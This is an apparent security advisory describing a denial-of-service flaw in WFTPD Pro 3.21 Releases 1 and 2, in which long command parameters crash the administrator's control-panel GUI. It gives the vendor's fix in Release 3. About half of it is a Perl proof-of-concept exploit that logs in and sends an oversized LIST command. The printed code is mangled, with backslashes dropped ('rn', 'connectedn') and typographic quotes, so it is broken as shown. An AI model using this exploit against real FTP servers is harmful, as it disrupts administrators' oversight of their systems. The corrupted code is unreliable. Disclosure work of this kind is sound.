‘WFTPD GUI DoS’

Summary

‘A vulnerability in WFTPD Pro allows a user issuing a long parameter (around 300 bytes) as a value for almost all commands, to cause a DoS attack against the controlling GUI of the WFTP Pro product. Once the attack has been launched, an administrator can no longer open the GUI and see the current connected users.’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability. ‘


Details

Vulnerable Systems:
 * WFTPD version 3.21 Release 2
 * WFTPD version 3.21 Release 1

Immune Systems:
 * WFTPD version 3.21 Release 3

Vendor Status:
WFTPD Pro 3.21 Release 3 is released on March 16, 2004, to fix a potential denial-of-service attack on the Control Panel applet discovered by STORM <storm[at]securiteam[dot]com>. Also changed in this version – the output to the control panel applet is changed to being sent only when a command executes.

Exploit:
#!/usr/bin/perl
# Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
# Created by Beyond Security Ltd. – All rights reserved.

use IO::Socket;

$host = ‘192.168.1.243’;

$remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $host, PeerPort => ‘2119’);

unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }

print ‘connectedn’;
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = ‘USER usernamern’;

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join(”, ‘PASS ‘, ‘password’, ‘rn’);
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join (”, ‘LIST ‘, ‘A’x260, ‘rn’); # DoS …

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;’

Categories: Windows